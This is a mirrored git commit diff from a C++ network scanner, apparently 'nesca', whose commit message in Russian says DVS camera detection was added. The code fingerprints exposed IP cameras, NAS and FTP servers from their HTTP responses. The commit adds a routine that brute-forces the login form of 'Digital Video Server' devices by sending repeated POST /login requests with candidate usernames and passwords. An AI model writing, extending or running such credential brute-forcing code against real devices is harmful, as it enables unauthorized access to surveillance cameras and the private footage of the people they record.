mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 18:52:19 +00:00
Добавлен детект DVS-камеры.
This commit is contained in:
cora32
parent
369f6440fe
commit
4dd27f9605
@ -1579,7 +1579,7 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C
|
|||||||
++offlines;
|
++offlines;
|
||||||
if(iError == 10055)
|
if(iError == 10055)
|
||||||
{
|
{
|
||||||
stt->doEmitionRedFoundData("[SOCKERR 10055] " + QString("Connection pool depleted ") + QString(ip) + ":" + QString::number(port));
|
stt->doEmitionRedFoundData("[SOCKERR 10055] Connection pool depleted " + QString(ip) + ":" + QString::number(port));
|
||||||
}
|
}
|
||||||
else if(iError == 10049)
|
else if(iError == 10049)
|
||||||
{
|
{
|
||||||
@ -2200,6 +2200,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
|
|||||||
{
|
{
|
||||||
negVector.push_back("403 Forbidden");
|
negVector.push_back("403 Forbidden");
|
||||||
}
|
}
|
||||||
|
else if(strcmp(SPEC, "DVS") == 0)
|
||||||
|
{
|
||||||
|
negVector.push_back("Non-Existed");
|
||||||
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
|
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
|
||||||
@ -2335,6 +2339,33 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
|
|||||||
strcat(request, "\r\n\r\n");
|
strcat(request, "\r\n\r\n");
|
||||||
strcat(request, passString);
|
strcat(request, passString);
|
||||||
delete []passString;
|
delete []passString;
|
||||||
|
}
|
||||||
|
else if(strcmp(SPEC, "DVS") == 0)
|
||||||
|
{
|
||||||
|
strcpy(request, "POST /login HTTP/1.1\r\nHost: ");
|
||||||
|
strcat(request, ip);
|
||||||
|
if(port != 80){
|
||||||
|
strcat(request, ":");
|
||||||
|
char tbuff[16] = {0};
|
||||||
|
strcat(request, itoa(port, tbuff, 10));
|
||||||
|
};
|
||||||
|
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
|
||||||
|
int loginLength = strlen(login);
|
||||||
|
int passLength = strlen(pass);
|
||||||
|
int sz = loginLength + passLength + strlen("langs=en&user=&password=&submit=+Login+");
|
||||||
|
char *passString = new char[sz + 1];
|
||||||
|
ZeroMemory(passString, sizeof(passString));
|
||||||
|
strcpy(passString, "langs=en&user=");
|
||||||
|
strcat(passString, login);
|
||||||
|
strcat(passString, "&password=");
|
||||||
|
strcat(passString, pass);
|
||||||
|
strcat(passString, "&submit=+Login+");
|
||||||
|
strcat(request, "\r\nContent-Length: ");
|
||||||
|
char tempBuff[16] = {0};
|
||||||
|
strcat(request, itoa(sz, tempBuff, 10));
|
||||||
|
strcat(request, "\r\n\r\n");
|
||||||
|
strcat(request, passString);
|
||||||
|
delete []passString;
|
||||||
};
|
};
|
||||||
|
|
||||||
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
|
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
|
||||||
|
|||||||
112
finder.cpp
112
finder.cpp
@ -291,6 +291,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
|
|||||||
) return 44; //hikvision cam 2
|
) return 44; //hikvision cam 2
|
||||||
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
|
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
|
||||||
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
|
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
|
||||||
|
if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server
|
||||||
|
|
||||||
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|
||||||
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
|
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
|
||||||
@ -311,64 +312,71 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
|
|||||||
//> 1600
|
//> 1600
|
||||||
int _mainFinderSecond(char *buffcpy, int port, char *ip)
|
int _mainFinderSecond(char *buffcpy, int port, char *ip)
|
||||||
{
|
{
|
||||||
if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|
if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL
|
||||||
|| strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL)
|
|| (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|
||||||
|
|| strstr(buffcpy, "401 unauthorized access denied") != NULL
|
||||||
|
|| strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL
|
||||||
|
&& strstr(buffcpy, " 401\r\n") != NULL)
|
||||||
)
|
)
|
||||||
&& strstr(buffcpy, "digest realm") != NULL
|
&& strstr(buffcpy, "digest realm") != NULL && strstr(buffcpy, "basic realm") == NULL
|
||||||
&& strstr(buffcpy, "basic realm") == NULL
|
) return 101;
|
||||||
) return 101;
|
if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL
|
||||||
if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|
|| (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|
||||||
|| strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL)
|
|| strstr(buffcpy, "401 unauthorized access denied") != NULL
|
||||||
) return 1;
|
|| strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL
|
||||||
if(strstr(buffcpy, "netwave ip camera")) return 11;
|
&& strstr(buffcpy, " 401\r\n") != NULL)
|
||||||
if(strstr(buffcpy, "live view / - axis")) return 12;
|
) return 1;
|
||||||
if(strstr(buffcpy, "vilar ipcamera")) return 13;
|
if(strstr(buffcpy, "netwave ip camera")) return 11;
|
||||||
if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14;
|
if(strstr(buffcpy, "live view / - axis")) return 12;
|
||||||
if(strstr(buffcpy, "httpfileserver")) return 15;
|
if(strstr(buffcpy, "vilar ipcamera")) return 13;
|
||||||
|
if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14;
|
||||||
|
if(strstr(buffcpy, "httpfileserver")) return 15;
|
||||||
if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL ||
|
if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL ||
|
||||||
strstr(buffcpy, "server push mode") != NULL
|
strstr(buffcpy, "server push mode") != NULL
|
||||||
) return 17; //Real-time IP Camera Monitoring System
|
) return 17; //Real-time IP Camera Monitoring System
|
||||||
if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras
|
if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras
|
||||||
if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras
|
if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras
|
||||||
if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon
|
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
|
||||||
if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control
|
if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon
|
||||||
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384
|
if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control
|
||||||
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40
|
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384
|
||||||
if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera
|
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40
|
||||||
if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera
|
if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera
|
||||||
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera
|
if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera
|
||||||
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40
|
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera
|
||||||
if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera
|
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40
|
||||||
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
|
if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera
|
||||||
if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX
|
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
|
||||||
if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras
|
if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX
|
||||||
if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "<b class=\"xb1\"></b>") != NULL) return 32; //web ip cam
|
if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras
|
||||||
if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam
|
if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "<b class=\"xb1\"></b>") != NULL) return 32; //web ip cam
|
||||||
|
if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam
|
||||||
|
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|
||||||
|
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
|
||||||
if((strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL)
|
if((strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL)
|
||||||
|| strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam
|
|| strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam
|
||||||
if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam
|
if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam
|
||||||
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180
|
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180
|
||||||
if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam
|
if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam
|
||||||
if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye
|
if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye
|
||||||
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300
|
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300
|
||||||
if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera
|
if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera
|
||||||
if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera
|
if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera
|
||||||
if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera
|
if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera
|
||||||
if(strstr(buffcpy, "lapassword") != NULL
|
if(strstr(buffcpy, "lapassword") != NULL
|
||||||
&& strstr(buffcpy, "lausername") != NULL
|
&& strstr(buffcpy, "lausername") != NULL
|
||||||
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
|
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
|
||||||
) return 44; //hikvision cam 2
|
) return 44; //hikvision cam 2
|
||||||
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
|
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
|
||||||
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
|
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
|
||||||
|
if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server
|
||||||
|
|
||||||
|
|
||||||
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|
|
||||||
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
|
|
||||||
|
|
||||||
if(((strstr(buffcpy, "220") != NULL) && (port == 21)) ||
|
if(((strstr(buffcpy, "220") != NULL) && (port == 21)) ||
|
||||||
(strstr(buffcpy, "220 diskStation ftp server ready") != NULL) ||
|
(strstr(buffcpy, "220 diskStation ftp server ready") != NULL) ||
|
||||||
(strstr(buffcpy, "220 ftp server ready") != NULL)
|
(strstr(buffcpy, "220 ftp server ready") != NULL)
|
||||||
|| strstr(buffcpy, "500 'get': command not understood") != NULL
|
|| strstr(buffcpy, "500 'get': command not understood") != NULL
|
||||||
) return 16; // 16 - FTP
|
) return 16; // 16 - FTP
|
||||||
|
|
||||||
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|
||||||
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
|
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
|
||||||
@ -378,11 +386,11 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip)
|
|||||||
|| strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL
|
|| strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL
|
||||||
|| strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL
|
|| strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL
|
||||||
|| strstr(buffcpy, "ipcam") != NULL
|
|| strstr(buffcpy, "ipcam") != NULL
|
||||||
) return 0;
|
) return 0;
|
||||||
|
|
||||||
if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1;
|
if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1;
|
||||||
if(globalSearchPrnt(buffcpy) == -1) return -1;
|
if(globalSearchPrnt(buffcpy) == -1) return -1;
|
||||||
if(strstr(buffcpy, "<form ") != NULL && strstr(buffcpy, "302 found") == NULL) return 10;
|
if(strstr(buffcpy, "<form ") != NULL && strstr(buffcpy, "302 found") == NULL) return 10;
|
||||||
return 3; //Suspicious
|
return 3; //Suspicious
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -1744,6 +1752,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
|
|||||||
else if(flag == 46) //Buffalo disk
|
else if(flag == 46) //Buffalo disk
|
||||||
{
|
{
|
||||||
_specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
|
_specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
|
||||||
|
}
|
||||||
|
else if(flag == 47) //Digital Video Server
|
||||||
|
{
|
||||||
|
_specWEBIPCAMBrute(ip, p, hl, "[DVS] Camera", flag, "[DVS] Camera", "Web Authorization", cp, recd, "DVS");
|
||||||
}
|
}
|
||||||
else if(flag == 20) //AXIS Camera
|
else if(flag == 20) //AXIS Camera
|
||||||
{
|
{
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user